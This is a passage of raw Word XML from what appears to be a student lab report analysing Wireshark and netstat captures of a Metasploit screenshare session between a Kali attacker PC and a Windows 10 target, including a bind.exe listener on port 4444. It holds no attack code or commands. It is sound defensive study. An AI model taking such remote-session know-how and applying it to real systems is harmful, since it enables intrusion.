          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16129DAD" wp14:editId="1D738853">
            <wp:extent cx="5731510" cy="338455"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="11141038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410388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60E72" w14:textId="2C197C82" w:rsidR="007441F5" w:rsidRDefault="007441F5" w:rsidP="007441F5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc150072433"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - New session initiated by Kali to 34.117.237.239</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidR="008F3C36">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EF4E92" w14:textId="68CA52AD" w:rsidR="00821DC9" w:rsidRDefault="00821DC9" w:rsidP="00821DC9">
      <w:r>
        <w:t xml:space="preserve">Using a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tool, this was found to be a </w:t>
      </w:r>
      <w:r w:rsidR="00C64F5F">
        <w:t>connection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to Google Cloud services</w:t>
      </w:r>
      <w:r w:rsidR="008F3C36">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87CFCA" w14:textId="77777777" w:rsidR="004B099F" w:rsidRDefault="004B099F" w:rsidP="004B099F">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="004B099F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31C56615" wp14:editId="056D19AD">
            <wp:extent cx="5731510" cy="1392555"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1667381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738183" name="Picture 1" descr="A screenshot of a compute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2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ECF1DC" w14:textId="7DDC1FB4" w:rsidR="00821DC9" w:rsidRDefault="004B099F" w:rsidP="004B099F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc150072434"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Filtering the Wireshark capture on </w:t>
      </w:r>
      <w:r w:rsidR="008F3C36">
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stream 0 to isolate the traffic between the Attacker and Target PCs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidR="008F3C36">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E203F8" w14:textId="2F9A1950" w:rsidR="00821DC9" w:rsidRDefault="004B099F" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This was unexpected, it appears that the traffic between the </w:t>
      </w:r>
      <w:r w:rsidR="00346ACC">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>ttacker</w:t>
      </w:r>
      <w:r w:rsidR="00C90615">
        <w:t xml:space="preserve"> PC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the target PC are </w:t>
      </w:r>
      <w:r w:rsidR="00940D3D">
        <w:t>consistently</w:t>
      </w:r>
      <w:r w:rsidR="00724AAC">
        <w:t xml:space="preserve"> using the TCP protocol and the </w:t>
      </w:r>
      <w:r w:rsidR="006D2E43">
        <w:t>PSH, ACK</w:t>
      </w:r>
      <w:r w:rsidR="00724AAC">
        <w:t xml:space="preserve"> and ACK flags. </w:t>
      </w:r>
      <w:r w:rsidR="00940D3D">
        <w:t xml:space="preserve">The above screenshot shows </w:t>
      </w:r>
      <w:r w:rsidR="00D2452A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">packets being sent when the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D2452A">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D2452A">
        <w:t xml:space="preserve"> screenshare session was in </w:t>
      </w:r>
      <w:r w:rsidR="00B95D20">
        <w:t xml:space="preserve">progress.  It had been anticipated that this traffic would have been UDP. </w:t>
      </w:r>
      <w:r w:rsidR="00CD7707">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B482C">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00FE730A">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00CD7707">
        <w:t xml:space="preserve">acket number 1518, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD7707">
        <w:t>Seq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD7707">
        <w:t>=7280782</w:t>
      </w:r>
      <w:r w:rsidR="00471450">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE730A">
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="00471450">
        <w:t xml:space="preserve"> marked </w:t>
      </w:r>
      <w:r w:rsidR="00FE730A">
        <w:t xml:space="preserve">so that </w:t>
      </w:r>
      <w:r w:rsidR="00471450">
        <w:t xml:space="preserve">the corresponding packet </w:t>
      </w:r>
      <w:r w:rsidR="00FE730A">
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="00471450">
        <w:t xml:space="preserve"> be located on the windows PC </w:t>
      </w:r>
      <w:r w:rsidR="00346ACC">
        <w:t>for analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B0429E" w14:textId="77777777" w:rsidR="002A71EA" w:rsidRDefault="00E61CA2" w:rsidP="002A71EA">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00E61CA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="346EDA46" wp14:editId="6C100A9C">
            <wp:extent cx="5731510" cy="3371215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1786123578" name="Picture 1" descr="A graph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6123578" name="Picture 1" descr="A graph on a white background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47D67" w14:textId="4D79EC0D" w:rsidR="009574C9" w:rsidRDefault="002A71EA" w:rsidP="002A71EA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc150072435"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Graph displaying the traffic between the two PCs on </w:t>
      </w:r>
      <w:r w:rsidR="008F3C36">
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stream </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5352916E" w14:textId="5F3A85B2" w:rsidR="00C92531" w:rsidRDefault="0015494C" w:rsidP="002A71EA">
      <w:r>
        <w:t>It can be seen from the graph above that when the screenshare session was initiate</w:t>
      </w:r>
      <w:r w:rsidR="00F25EDA">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in packet </w:t>
      </w:r>
      <w:r w:rsidR="002A71EA">
        <w:t>163</w:t>
      </w:r>
      <w:r w:rsidR="00C92531">
        <w:t xml:space="preserve">, the sequence number of packets increased substantially. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166DAC0B" w14:textId="77777777" w:rsidR="00167ED3" w:rsidRDefault="00167ED3" w:rsidP="00167ED3">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00167ED3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58240E22" wp14:editId="287BFEA9">
            <wp:extent cx="5731510" cy="704850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11966784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6678403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99F70B" w14:textId="5961990B" w:rsidR="002A71EA" w:rsidRPr="002A71EA" w:rsidRDefault="00167ED3" w:rsidP="00167ED3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc150072436"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Wireshark trace showing packet 163 and subsequent packets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidR="008F3C36">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344256E5" w14:textId="6019A961" w:rsidR="002A71EA" w:rsidRDefault="006D2E43" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Packet</w:t>
      </w:r>
      <w:r w:rsidR="00216A4D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A5DB5">
        <w:t xml:space="preserve">163 </w:t>
      </w:r>
      <w:r w:rsidR="002B0DB1">
        <w:t xml:space="preserve">(Sequence #5998) </w:t>
      </w:r>
      <w:r w:rsidR="003A5DB5">
        <w:t xml:space="preserve">in the </w:t>
      </w:r>
      <w:r w:rsidR="00C86E6B">
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r w:rsidR="003A5DB5">
        <w:t xml:space="preserve"> trace is </w:t>
      </w:r>
      <w:r w:rsidR="0005780B">
        <w:t>from the target PC to the attacker PC, as is the packet 164, but this time the packet length</w:t>
      </w:r>
      <w:r w:rsidR="00767776">
        <w:t xml:space="preserve"> and data</w:t>
      </w:r>
      <w:r w:rsidR="0005780B">
        <w:t xml:space="preserve"> has increased</w:t>
      </w:r>
      <w:r w:rsidR="00A11451">
        <w:t xml:space="preserve">.  Data being </w:t>
      </w:r>
      <w:r w:rsidR="00E83DA7">
        <w:t>20440 bytes which increases to 20</w:t>
      </w:r>
      <w:r w:rsidR="00F85545">
        <w:t>494 once the packet header has been added.</w:t>
      </w:r>
      <w:r w:rsidR="00E83DA7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FE0C05" w14:textId="77777777" w:rsidR="009D54B9" w:rsidRDefault="009D54B9" w:rsidP="009D54B9">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="009D54B9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16B8DA0D" wp14:editId="33231A59">
            <wp:extent cx="5731510" cy="487680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="10012328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1232898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B3D9E" w14:textId="6C0A5305" w:rsidR="00CF25E6" w:rsidRDefault="009D54B9" w:rsidP="009D54B9">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc150072437"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Wireshark trace showing the Metasploit session being </w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidR="008F3C36">
        <w:t>closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC242E8" w14:textId="369BCC9D" w:rsidR="003F516B" w:rsidRDefault="00D4212F" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Packet</w:t>
      </w:r>
      <w:r w:rsidR="00DA4EE9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF780E">
        <w:t>2577 is a Fin Ack</w:t>
      </w:r>
      <w:r w:rsidR="00E01C57">
        <w:t xml:space="preserve"> packet and is a response to packet 257</w:t>
      </w:r>
      <w:r w:rsidR="00475A84">
        <w:t>6 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00475A84">
        <w:t>Seq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00475A84">
        <w:t xml:space="preserve"> ending in 7390)</w:t>
      </w:r>
      <w:r w:rsidR="003D0D70">
        <w:t xml:space="preserve"> sent from the attacker’s PC</w:t>
      </w:r>
      <w:r w:rsidR="00475A84">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00922A12">
        <w:t xml:space="preserve">This is interesting as it was expected that </w:t>
      </w:r>
      <w:r w:rsidR="000A4277">
        <w:t xml:space="preserve">packet 2576 would have had its </w:t>
      </w:r>
      <w:r w:rsidR="00381FD8">
        <w:t>FIN flag</w:t>
      </w:r>
      <w:r w:rsidR="000A4277">
        <w:t xml:space="preserve"> set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D77357" w14:textId="77777777" w:rsidR="00381FD8" w:rsidRDefault="00381FD8" w:rsidP="003F516B"/>
    <w:p w14:paraId="1F27DF00" w14:textId="77777777" w:rsidR="00381FD8" w:rsidRPr="003F516B" w:rsidRDefault="00381FD8" w:rsidP="003F516B"/>
    <w:p w14:paraId="537A3CA5" w14:textId="10736D2C" w:rsidR="00CF25E6" w:rsidRDefault="00CF25E6" w:rsidP="00EA5E98">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Analysis from the perspective of the Windows 10 target PC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B376D4D" w14:textId="00AFE0E9" w:rsidR="00CF25E6" w:rsidRDefault="00CF25E6"/>
    <w:p w14:paraId="0FB872A9" w14:textId="3E70B4F1" w:rsidR="004907A9" w:rsidRDefault="004907A9" w:rsidP="004907A9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The text </w:t>
      </w:r>
      <w:r w:rsidR="006D2E43">
        <w:t xml:space="preserve">below </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">was copied from a netstat capture on the Windows 10 PC, this shows the TCP connection between the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00512A20">
        <w:t xml:space="preserve">PC </w:t>
      </w:r>
      <w:r>
        <w:t>and the target PC.  If there had been sufficient time</w:t>
      </w:r>
      <w:r w:rsidR="00DA09BD">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the next step would have </w:t>
      </w:r>
      <w:r w:rsidR="00DA09BD">
        <w:t>been to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> investigate the process ID number 6220 to determine the nature of the programme being ran.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B204309" w14:textId="77777777" w:rsidR="004907A9" w:rsidRDefault="004907A9"/>
    <w:p w14:paraId="332E8D3D" w14:textId="77777777" w:rsidR="00531000" w:rsidRPr="006D2E43" w:rsidRDefault="00531000" w:rsidP="00531000">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D2E43">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">  TCP    10.0.2.5:139           0.0.0.0:0              LISTENING       4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED319B" w14:textId="77777777" w:rsidR="00531000" w:rsidRPr="006D2E43" w:rsidRDefault="00531000" w:rsidP="00531000">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D2E43">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Can not obtain ownership </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D2E43">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>information</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7594D5FB" w14:textId="77777777" w:rsidR="00531000" w:rsidRPr="006D2E43" w:rsidRDefault="00531000" w:rsidP="00531000">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D2E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">  TCP    10.0.2.5:4444          10.0.2.6:38891         ESTABLISHED     6220</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E1F3BE" w14:textId="77777777" w:rsidR="00531000" w:rsidRPr="006D2E43" w:rsidRDefault="00531000" w:rsidP="00531000">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D2E43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> [bind.exe]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C50C014" w14:textId="77777777" w:rsidR="00531000" w:rsidRPr="006D2E43" w:rsidRDefault="00531000" w:rsidP="00531000">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D2E43">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">  TCP    10.0.2.5:49674         20.90.153.243:443      ESTABLISHED     600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E58300" w14:textId="77777777" w:rsidR="00531000" w:rsidRPr="006D2E43" w:rsidRDefault="00531000" w:rsidP="00531000">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D2E43">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D2E43">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ProfSvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00B52345" w14:textId="5FDF78A1" w:rsidR="00531000" w:rsidRPr="006D2E43" w:rsidRDefault="00531000" w:rsidP="00531000">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D2E43">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> [svchost.exe]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA07D11" w14:textId="77777777" w:rsidR="00FD5288" w:rsidRDefault="00FD5288" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60ACB612" w14:textId="731CD0F9" w:rsidR="000F520C" w:rsidRDefault="00413E33" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On the </w:t>
      </w:r>
      <w:r w:rsidR="00E22140">
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trace</w:t>
      </w:r>
      <w:r w:rsidR="00E22140">
        <w:t xml:space="preserve"> of the Windows 10 PC</w:t>
      </w:r>
      <w:r w:rsidR="00F53426">
        <w:t xml:space="preserve">, the corresponding two packets </w:t>
      </w:r>
      <w:r w:rsidR="00E22140">
        <w:t>hi</w:t>
      </w:r>
      <w:r w:rsidR="00BA639D">
        <w:t>gh-</w:t>
      </w:r>
      <w:r w:rsidR="00407646">
        <w:t>ligh</w:t>
      </w:r>
      <w:r w:rsidR="00E22140">
        <w:t>ted previously were located for analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059A363C" w14:textId="77777777" w:rsidR="00B262F4" w:rsidRDefault="00B262F4" w:rsidP="000F520C"/>
    <w:p w14:paraId="391BDB68" w14:textId="77777777" w:rsidR="00D95A27" w:rsidRDefault="00B262F4" w:rsidP="00D95A27">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00B262F4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="762659B2" wp14:editId="37E584F0">
            <wp:extent cx="5731510" cy="565150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="63720260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7202605" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="74780"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="565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3EC035" w14:textId="631FD170" w:rsidR="00CE58C3" w:rsidRDefault="00D95A27" w:rsidP="00280B0E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc150072438"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Windows 10 PC sending Acknowledgements to the Attacker's PC for Packet 5998</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidR="008F3C36">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F9AC20" w14:textId="0C941E7C" w:rsidR="00CE58C3" w:rsidRDefault="00CE58C3" w:rsidP="00CE58C3">
      <w:r>
        <w:t xml:space="preserve">The above </w:t>
      </w:r>
      <w:r w:rsidR="00E13F8C">
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capture shows the </w:t>
      </w:r>
      <w:r w:rsidR="00255AC9">
        <w:t xml:space="preserve">reply to </w:t>
      </w:r>
      <w:r w:rsidR="00056112">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00255AC9">
        <w:t xml:space="preserve">packet with the </w:t>
      </w:r>
      <w:r w:rsidR="006F042B">
        <w:t xml:space="preserve">sequence number 5998, which is believed to </w:t>
      </w:r>
      <w:r w:rsidR="00280B0E">
        <w:t xml:space="preserve">have </w:t>
      </w:r>
      <w:r w:rsidR="00E13F8C">
        <w:t>initiated</w:t>
      </w:r>
      <w:r w:rsidR="006F042B">
        <w:t xml:space="preserve"> the screenshare session.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53778C33" w14:textId="77777777" w:rsidR="00474610" w:rsidRDefault="00474610" w:rsidP="00CE58C3"/>
    <w:p w14:paraId="3D59A439" w14:textId="218A32B5" w:rsidR="00474610" w:rsidRDefault="009E25FA" w:rsidP="00EA5E98">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00915803">
        <w:t>indings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A301C65" w14:textId="77777777" w:rsidR="00B6691C" w:rsidRDefault="00B6691C" w:rsidP="00B6691C"/>
    <w:p w14:paraId="56AEDE17" w14:textId="1DF66029" w:rsidR="00B6691C" w:rsidRPr="00B6691C" w:rsidRDefault="00B6691C" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B6691C">
        <w:t xml:space="preserve">It was noted that </w:t>
      </w:r>
      <w:r w:rsidR="004907A9" w:rsidRPr="00B6691C">
        <w:t>many</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6691C">
        <w:t xml:space="preserve"> packets in this TCP stream had the Acknowledge flag set and were </w:t>
      </w:r>
      <w:r w:rsidR="008F3C36" w:rsidRPr="00B6691C">
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6691C">
        <w:t xml:space="preserve"> the attacker’s PC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8B0E5F" w14:textId="4CCCF2B6" w:rsidR="00B6691C" w:rsidRPr="00B6691C" w:rsidRDefault="00B6691C" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B6691C">
        <w:t xml:space="preserve">This was unexpected, as it had been anticipated that </w:t>
      </w:r>
      <w:r w:rsidR="00AE347C" w:rsidRPr="00B6691C">
        <w:t>most of</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6691C">
        <w:t xml:space="preserve"> the traffic from the screenshare session would have originated from the Target PC </w:t>
      </w:r>
      <w:r w:rsidR="008F3C36" w:rsidRPr="00B6691C">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6691C">
        <w:t xml:space="preserve"> would have been UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D3B7FC" w14:textId="76AB5B57" w:rsidR="009E25FA" w:rsidRDefault="00C406B6" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>If a network engineer were investigating t</w:t>
      </w:r>
      <w:r w:rsidR="0029724D">
        <w:t xml:space="preserve">he nature of this </w:t>
      </w:r>
      <w:r w:rsidR="00AE347C">
        <w:t>data,</w:t>
      </w:r>
      <w:r w:rsidR="0029724D">
        <w:t xml:space="preserve"> they wouldn’t necessarily think that the traffic was streaming a desktop, a</w:t>
      </w:r>
      <w:r w:rsidR="00E23194">
        <w:t xml:space="preserve">s the software is not using a </w:t>
      </w:r>
      <w:r w:rsidR="008F6D01">
        <w:t>recognised port used for streaming</w:t>
      </w:r>
      <w:r w:rsidR="00142734">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008F6D01">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00345ECB">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00865651">
        <w:t>dditionally, a</w:t>
      </w:r>
      <w:r w:rsidR="008F6D01">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="00345ECB">
        <w:t>the se</w:t>
      </w:r>
      <w:r w:rsidR="00AE40C8">
        <w:t xml:space="preserve">ssion </w:t>
      </w:r>
      <w:r w:rsidR="008F6D01">
        <w:t>is using the TCP protocol, not</w:t>
      </w:r>
      <w:r w:rsidR="0023237C">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00BA3F94">
        <w:t>expected</w:t>
      </w:r>
      <w:r w:rsidR="008F6D01">
        <w:t xml:space="preserve"> UDP</w:t>
      </w:r>
      <w:r w:rsidR="004722B9">
        <w:t xml:space="preserve"> (User Datagram Protocol)</w:t>
      </w:r>
      <w:r w:rsidR="008F6D01">
        <w:t xml:space="preserve"> or QUIC</w:t>
      </w:r>
      <w:r w:rsidR="00677F40">
        <w:t xml:space="preserve"> (Quick UDP Internet Connections)</w:t>
      </w:r>
      <w:r w:rsidR="00FD3EBC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
